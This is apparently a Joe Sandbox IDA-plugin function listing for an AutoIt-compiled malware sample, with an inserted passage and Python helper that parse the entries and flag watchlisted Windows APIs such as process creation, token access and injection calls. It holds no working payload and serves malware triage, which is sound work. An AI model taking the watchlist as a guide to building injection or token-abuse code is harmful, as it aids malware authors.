                                                                                • Instruction Fuzzy Hash: 40015B71404B009ED720AF79C90574AB7F0FF54335F21890EA59AD62A0DB74A684CB46
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008AE33D
                                                                                • _memset.LIBCMT ref: 008AE34C
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00903D00,00903D44), ref: 008AE37B
                                                                                • CloseHandle.KERNEL32 ref: 008AE38D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                • String ID:
                                                                                • API String ID: 3277943733-0
                                                                                • Opcode ID: 33d7a60a7da3a4a3278caab7b3d936dbc45494fcab1cd8cd7f978b1c5d2fa46c
                                                                                • Instruction ID: 900b63f899e7b9b99371f02f85adefb0673b59ff5b2742c9095fed1c138069a0
                                                                                • Opcode Fuzzy Hash: 33d7a60a7da3a4a3278caab7b3d936dbc45494fcab1cd8cd7f978b1c5d2fa46c
                                                                                • Instruction Fuzzy Hash: A6F05EF1550314BFE3112B65AC45F777EACEB04754F018521BE08D62E2D3759E0096A9
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 0084EBFA
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084ED9F
                                                                                • TranslateMessage.USER32(?), ref: 008B59F7
                                                                                • DispatchMessageW.USER32(?), ref: 008B5A05
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008B5A19
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 953213773-0
                                                                                • Opcode ID: 4a6d52b54ad55214fd3c2fb05865f092399adcb80916a8f19f115615e9b998a8
                                                                                • Instruction ID: 12d1a51144683573236a290e4280edb6f28c4bc14464c5cb2f5ab94b214f7584
                                                                                • Opcode Fuzzy Hash: 4a6d52b54ad55214fd3c2fb05865f092399adcb80916a8f19f115615e9b998a8
                                                                                • Instruction Fuzzy Hash: B0F0303260938DDAD720D7A8EC49FDA7BACFB54755F10486BA60AD2040EA34A508C772
                                                                                APIs
                                                                                  • Part of subcall function 0085AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0085AFE3
                                                                                  • Part of subcall function 0085AF83: SelectObject.GDI32(?,00000000), ref: 0085AFF2
                                                                                  • Part of subcall function 0085AF83: BeginPath.GDI32(?), ref: 0085B009
                                                                                  • Part of subcall function 0085AF83: SelectObject.GDI32(?,00000000), ref: 0085B033
                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 008AEA8E
                                                                                • LineTo.GDI32(00000000,?,?), ref: 008AEA9B
                                                                                • EndPath.GDI32(00000000), ref: 008AEAAB
                                                                                • StrokePath.GDI32(00000000), ref: 008AEAB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 6b82888aaaf7171eef13fb65b7e3a6546e01d97ff57486c3ddfb09fed9d6dae7
                                                                                • Instruction ID: 13e753b70a775070c93c7154e6e7c16c22cdb559e7088ef41eb7dae41a35eafc
                                                                                • Opcode Fuzzy Hash: 6b82888aaaf7171eef13fb65b7e3a6546e01d97ff57486c3ddfb09fed9d6dae7
                                                                                • Instruction Fuzzy Hash: A0F08232005669BBEB12AF98AC0DFCE3F69BF16311F084211FE11A10E187755551DB99
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0087C84A
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0087C85D
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0087C864
                                                                                • AttachThreadInput.USER32(00000000), ref: 0087C86B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: a783085e35f253769a5b8359fec684b9a99804ba558e73c8f3be52d7e82ab89b
                                                                                • Instruction ID: 87548074378c9d3aadde311ee394e03f5b44eb8be4738c779dbb4a6acddbdafc
                                                                                • Opcode Fuzzy Hash: a783085e35f253769a5b8359fec684b9a99804ba558e73c8f3be52d7e82ab89b
                                                                                • Instruction Fuzzy Hash: 17E01571141228BADB20ABA2AC0DEDBBF2CFB167A1F008039B60D85461C6B1C580CBE0
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0087B0D6
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,0087AC9D), ref: 0087B0DD
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0087AC9D), ref: 0087B0EA
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,0087AC9D), ref: 0087B0F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: 660018369c388f7147b681cba702c63695c0322705d1bce98542c1f93733cd48
                                                                                • Instruction ID: 6bb236aca6be159705438bd29e673ea140df9e18aa6c3876640cabd681c1c3e1
                                                                                • Opcode Fuzzy Hash: 660018369c388f7147b681cba702c63695c0322705d1bce98542c1f93733cd48
                                                                                • Instruction Fuzzy Hash: 91E04F326013119BD7202FB65C0CF473BB9FF55791F018838A245D6040EA3484028760
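The function entries above are the raw output of the Joe Sandbox IDA plugin, and a report of this size carries hundreds of them; most belong to the C runtime or, since the sample is a compiled AutoIt script, to the interpreter's own built-ins (the CreateProcessW, AttachThreadInput, OpenProcessToken and GetPixel clusters on this page are typical of AutoIt's Run, WinActivate, IsAdmin and pixel functions rather than of FormBook's injection code, so a hit is a pointer to open in a disassembler, not a verdict). The triage helper below is an added example written for this page, not part of the Joe Sandbox report or its plugin. It parses entries in the exact layout shown above (the "APIs" list with direct and "Part of subcall function" references, the "Offset: ..., based on PE" module base, and the "API ID" string), flags those whose imports hit a watchlist, and converts a flagged reference address to an RVA against the dumped module base. The watchlist categories and the three sample entries embedded in SAMPLE are the author's constructions; the sample lines copy the format of the entries on this page but are not a live report.

```python
"""Triage helper for Joe Sandbox IDA-plugin function listings (added example)."""
import re

# Constructed sample in the page's layout: three entries, trimmed to the
# lines the parser consumes. Not taken from a live report.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 008AE33D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00903D00,00903D44), ref: 008AE37B
• CloseHandle.KERNEL32 ref: 008AE38D
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: _memset$CloseCreateHandleProcess
• API String ID: 3277943733-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0087C84A
• GetCurrentThreadId.KERNEL32 ref: 0087C864
• AttachThreadInput.USER32(00000000), ref: 0087C86B
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
APIs
  • Part of subcall function 00867CF4: EnterCriticalSection.KERNEL32(00000000,?,00867ADD,0000000D), ref: 00867D1F
• InterlockedIncrement.KERNEL32(?), ref: 00867AE5
Similarity
• API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
"""

# One API reference: optional subcall prefix, Name.MODULE, optional (args), ", ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
BASE_RE = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]+),\s*based on PE")
APIID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>\S.*?)\s*$")

# Assumed watchlist (author's choice): imports a triager wants surfaced first.
WATCHLIST = {
    "process_creation": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "token_access": {"OpenProcessToken", "OpenThreadToken", "AdjustTokenPrivileges"},
    "input_hijack": {"AttachThreadInput", "BlockInput"},
    "remote_memory": {"WriteProcessMemory", "VirtualAllocEx", "NtMapViewOfSection",
                      "QueueUserAPC", "SetThreadContext", "NtSetContextThread"},
    "screen_sampling": {"GetPixel", "BitBlt"},
}


def parse_entries(text):
    """Split the listing at each 'APIs' header; collect that entry's direct and
    subcall API references, its module base (if present) and its API ID."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "api_id": "", "base": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = BASE_RE.search(line)
        if m:
            cur["base"] = int(m.group("base"), 16)
            continue
        m = APIID_RE.match(line)
        if m:
            cur["api_id"] = m.group("id")
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"name": m.group("name"), "module": m.group("module"),
                                "ref": int(m.group("ref"), 16),
                                "via_subcall": m.group("sub") is not None})
    return entries


def flag_entries(entries, watchlist=WATCHLIST):
    """Return (index, api_id, {category: [api names]}) for entries that hit the
    watchlist; references reached only through a subcall are marked as such."""
    flagged = []
    for idx, e in enumerate(entries):
        hits = {}
        for api in e["apis"]:
            for cat, names in watchlist.items():
                if api["name"] in names:
                    tag = api["name"] + ("(subcall)" if api["via_subcall"] else "")
                    hits.setdefault(cat, []).append(tag)
        if hits:
            flagged.append((idx, e["api_id"], hits))
    return flagged


def rva_of(entry, api_name):
    """RVA of the first reference to api_name, relative to the module base the
    entry's 'Offset: ..., based on PE' line reports (here 0x840000)."""
    if entry["base"] is None:
        raise ValueError("entry carries no module base")
    for api in entry["apis"]:
        if api["name"] == api_name:
            return api["ref"] - entry["base"]
    raise KeyError(api_name)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for idx, api_id, hits in flag_entries(parsed):
        print(f"entry {idx}: {api_id}: {hits}")
```

Run it over the text of a whole report (the "APIs" header is what delimits entries) and read the flagged entries in the order they appear; the RVA lets you jump straight to the call site in the dumped module rather than hunting for the absolute address.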
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 0085B496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0085B4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0085B4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 0085B4BD
                                                                                • GetWindowDC.USER32(?,00000000), ref: 008BDE2B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 008BDE38
                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 008BDE51
                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 008BDE6A
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 008BDE8A
                                                                                • ReleaseDC.USER32(?,00000000), ref: 008BDE95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 1946975507-0
                                                                                • Opcode ID: fc442391435fd7d3c4c6b06eaf8958e797aca7d4b580387634d9756bc5637b4e
                                                                                • Instruction ID: 390c535241d3dc218c6c904fc06a92a4348e4504c7178fe6be2ba0d29e52aedf
                                                                                • Instruction Fuzzy Hash: 74E0C931100340ABDB216B64AC09BD97B21FB51336F188666FAA9980E2977185859B11
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 2921048691f447a3feb65a182a2cfa83ead1b388a9310270a9746c9625b84d5a
                                                                                • Instruction ID: 1496880134052534f8fa2a5e6cf6a6d61c9d29de672477a7dcc425d6c85907db
                                                                                • Instruction Fuzzy Hash: 4DE01AB1100304EFDB006F709848E6D7BB5FB5C355F118825FC5AC7211CA7498409B80
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0087B2DF
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 0087B2EB
                                                                                • CloseHandle.KERNEL32(?), ref: 0087B2F4
                                                                                • CloseHandle.KERNEL32(?), ref: 0087B2FC
                                                                                  • Part of subcall function 0087AB24: GetProcessHeap.KERNEL32(00000000,?,0087A848), ref: 0087AB2B
                                                                                  • Part of subcall function 0087AB24: HeapFree.KERNEL32(00000000), ref: 0087AB32
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: 3551d11e67ed2667c069bff9ba767ee99fb019f68c305773c85a9187891d7112
                                                                                • Instruction ID: d462b990c6628f8c63a000d1a1e2a0b6ceca6649639cc55a79abe561e8060d7e
                                                                                • Instruction Fuzzy Hash: FEE0263A104505BBDB017BA5EC08C59FBB6FF993213108631F625816B5DB32A871EB91
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 3f23e7c8df19217a618cc7884281b9a008f790f0e5465b5353f8290c667ed3ac
                                                                                • Instruction ID: 968e8152d1665ad69e6546200f80217792c3282707b31f936619d39dcbe3c716
                                                                                • Instruction Fuzzy Hash: A7E012B1500304EFDB006F709848E297BB9FB5C355B118829FD9ACB211CA78A840CB80
                                                                                APIs
                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0087DEAA
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ContainedObject
                                                                                • String ID: AutoIt3GUI$Container
                                                                                • API String ID: 3565006973-3941886329
                                                                                • Opcode ID: 84d82463cdbc5103fd10ae125d835bc4f74af207c69ed3dc44195bfec2cb8cc4
                                                                                • Instruction ID: f8b01d33fb53099895267b39d2b80a89b75dfa0a9e453ef07364cfd5bc633b3c
                                                                                • Instruction Fuzzy Hash: 33913670600705AFDB24DF64C884B6ABBB5FF48714F14856EF94ACB295DB71E841CB60
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 0085BCDA
                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0085BCF3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: e0a10a0ab05c6cb88290d74822605eedd72e6cf0971cbba63f94207da1642c2f
                                                                                • Instruction ID: afbed950889fad9b55f43d9ea853ccd542ea33ed635d623bc820cc3d7b4c862d
                                                                                • Instruction Fuzzy Hash: 205124714087449BE720AF28D886BAFBBE8FB95355F41484EF5C8811A2DF7089ACC757
                                                                                APIs
                                                                                  • Part of subcall function 008444ED: __fread_nolock.LIBCMT ref: 0084450B
                                                                                • _wcscmp.LIBCMT ref: 0088C65D
                                                                                • _wcscmp.LIBCMT ref: 0088C670
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                • String ID: FILE
                                                                                • API String ID: 4029003684-3121273764
                                                                                • Opcode ID: 849fe25c93051206e6aa73fe9140c312040fdbbb9c17c8696320a4c583e6f01c
                                                                                • Instruction ID: d11788cae74e6c7bdb7e8b15b6897a9efde3d60e09474edc68cc38a7b938868f
                                                                                • Instruction Fuzzy Hash: 1D41B672A0020ABADF20EAA89C41FEF77B9FF49714F010479F605E7181D6759A048B61
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 008AA85A
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008AA86F
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                • Opcode ID: 87c48dd0423d5d3d9e672804e1bb9fabe4c4851ce2ab9e63165d323602f583af
                                                                                • Instruction ID: 4121610f87c4ebd6e4b5fb11f8d94b68a2944df4fb1bc74aa5163bcf98ac194f
                                                                                • Instruction Fuzzy Hash: B7410875E013099FEB58CF68C880BEA7BB9FB09304F10006AE905EBB41D775A941CFA1
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00895190
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 008951C6
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CrackInternet_memset
                                                                                • String ID: |
                                                                                • API String ID: 1413715105-2343686810
                                                                                • Opcode ID: 1b8e76be0c1288929980b5f13701af49f12b41feb1f43fe67e5df4e4b27014b3
                                                                                • Instruction ID: fcb1e753dcf63feef9a4fecc58e571d4ea17ec5ddd7adcdb55c91877aecd59d8
                                                                                • Instruction Fuzzy Hash: 12314A71C01119ABCF41EFE4CC85AEE7FB9FF14704F100019F915A6166EB71AA06CBA1
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 008A980E
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008A984A
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                • Opcode ID: b3e8a31fe9c05e3bf7ebff24cda557ee80b88bc943e50f59e088803a33403b2f
                                                                                • Instruction ID: cf33b1acf41fc3e3083aa187d638b18de8653a02d0c9ca41f04fa801edfe9212
                                                                                • Instruction Fuzzy Hash: 92317C71110604AEEB109F78CC80FBB77A9FF5A764F108629F9A9C7190DA35AC85D760
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008851C6
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00885201
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: 6e16741498a337669f366fbfa5b4bfb691cc07ddd822df21353a5515c43ad0e9
                                                                                • Instruction ID: 6c4a3f6c3db6647d3257d66787077eca672661967574aaa3b92be29d4f7a3ef4
                                                                                • Instruction Fuzzy Hash: ED31F631600705EFEB25EF99D845BAEBBF5FF45390F144029ED81E61A0EB709A44CB11
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: __snwprintf
                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                • API String ID: 2391506597-2584243854
                                                                                • Opcode ID: 7da12c1476b5889526e20901ef076e1fa3ee9c1ee1131486263b3ddb9512b1fd
                                                                                • Instruction ID: e252bcffad34188819bf487f6d57ef1c20ca440371e986ab96d05b32bbdfd283
                                                                                • Opcode Fuzzy Hash: 7da12c1476b5889526e20901ef076e1fa3ee9c1ee1131486263b3ddb9512b1fd
                                                                                • Instruction Fuzzy Hash: 80215C7160021CAFCF11EFA8C882AAE77B4FF55740F044459F505EB286EB74EA55CBA2
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008A945C
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008A9467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                • Opcode ID: 2074adab33abd91871d37f33dc58ab90d7a7f21be76d69c265a05807a0b0e719
                                                                                • Instruction ID: c17298de8e6bbbf40af9e478cd1f126bbb43feeeffe673038fc092de8228e37d
                                                                                • Opcode Fuzzy Hash: 2074adab33abd91871d37f33dc58ab90d7a7f21be76d69c265a05807a0b0e719
                                                                                • Instruction Fuzzy Hash: D211B2B1315208AFFF219E58DC80EBB376EFB893A4F100125F958DB690D6759C528764
                                                                                APIs
                                                                                  • Part of subcall function 0085D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0085D1BA
                                                                                  • Part of subcall function 0085D17C: GetStockObject.GDI32(00000011), ref: 0085D1CE
                                                                                  • Part of subcall function 0085D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0085D1D8
                                                                                • GetWindowRect.USER32(00000000,?), ref: 008A9968
                                                                                • GetSysColor.USER32(00000012), ref: 008A9982
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                • Opcode ID: 1c97aafb5a2f6fdc77a819cbc7bad0b42de62e00eaf130f7acb43fb1ccb284b8
                                                                                • Instruction ID: 3414d6aaef118a077e6262f3d2ccf8869ea1c4bff63963ebe8c1dfc0a549e806
                                                                                • Opcode Fuzzy Hash: 1c97aafb5a2f6fdc77a819cbc7bad0b42de62e00eaf130f7acb43fb1ccb284b8
                                                                                • Instruction Fuzzy Hash: 19112672524209AFEB14DFB8CC45EEA7BB8FB09344F055628F995E2250E735E850DB60
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 008A9699
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008A96A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                • Opcode ID: ee1cfb92e0cb611c9edb2751358e6182dbd9462f63329279047f4f406bfd7a6c
                                                                                • Instruction ID: 467139728533f6d75f1f421f469f074e26bc7cfed4f3229f7f7a6416475e857f
                                                                                • Opcode Fuzzy Hash: ee1cfb92e0cb611c9edb2751358e6182dbd9462f63329279047f4f406bfd7a6c
                                                                                • Instruction Fuzzy Hash: 97116A71504208AAFB105F68DC44EEB3B6AFF26368F104724F9A5D75E0C7359C51A760
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008852D5
                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008852F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
